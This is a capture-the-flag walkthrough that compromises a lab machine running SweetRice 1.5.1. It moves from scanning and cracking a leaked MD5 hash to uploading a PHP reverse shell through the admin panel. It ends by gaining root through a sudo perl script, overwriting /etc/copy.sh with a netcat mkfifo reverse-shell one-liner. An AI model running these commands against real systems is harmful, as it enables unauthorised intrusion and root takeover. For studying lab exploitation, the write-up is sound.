Enumeration

I started with a network scan using rustscan.

rustscan -a 10.10.10.10 --ulimit 5000 -- -sC -sV

-a | Host/address

-- | Arguments following will be piped into Nmap

-sC | Default scripts

-sV | Version detection

With this, there are two open ports on the machine. 22(ssh) and 80(http). I started by browsing to the webpage, but it was just the default Apache installation page. So, I then ran feroxbuster to check for any other interesting directories on the server. The only directory found was /content/, with multiple subdirectories: /content/inc, /content/as, /content/attachments, etc. Browsing to http://10.10.10.10/content reveals the website is hosting SweetRice.

The next thing I did was look in the /content/inc directory, as that can usually include core-components to the website, like database logins if not setup properly. I found two interesting files. 1) latest.txt which included just “1.5.1”, which I assume was the SweetRice version. And mysql_backups which had a mySQL backup. First, I looked up SweetRice 1.5.1 vulnerabilities, and found an Arbitrary File Upload. This exploit requires a username and password to use, so let’s find it.

Password Cracking

In the backup file, we can find the username and a hashed password. All we have to do is run the hash through JohnTheRipper or Hashcat and we will crack it.

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash
hashcat -a -m 0 hash /usr/share/wordlists/rockyou.txt

Exploitation

With the username and password, we can now run the exploit. I first started by getting a PHP reverse shell from pentestmonkey and started a listener:

ncat -lvnp 8888

I ran python3 exploit.py and gave the username, password, and file to upload, and it said it uploaded successfully. However, when browsing to http://10.10.10.10/content/attachments/rev.php I was given a file not found, so the exploit didn’t seem to be working.

I then went to http://10.10.10.10/content/as and logged in to the administrator account. I did some digging and noticed that you can go to the Ads section and upload code. So, I uploaded the PHP reverse shell and started listening again, and went to http://10.10.10.10/content/ads/rev.php and was given a reverse shell.

A whoami reveals we are www-data, and doing cd /home and then ls shows an itguy home folder. ls itguy will reveal our user.txt which can be accessed via cat user.txt.

Privilege Escalation

We can start with sudo -l to see what all www-data can run as sudo. The only thing is a perl script, backup.pl. We can analyze the backup.pl file with cat and notice it runs a shell command, /etc/copy.sh. We can cat this and see it runs:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.1 5554 >/tmp/f

So, we have a shell reverse-shell that we can access as sudo. We just need to modify the IP address to ours. I first tried using nano, but it wouldn’t work. vim and vi didn’t work either. The only solution I could think of was to overwrite the file with echo:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 5554 >/tmp/f" > /etc/copy.sh

Now, we will create another listener with

nct -lvnp 5554

and run the Perl script as sudo, which will call our modified copy.sh.

sudo /usr/bin/perl /home/itguy/backup.pl

This will give us a root reverse shell.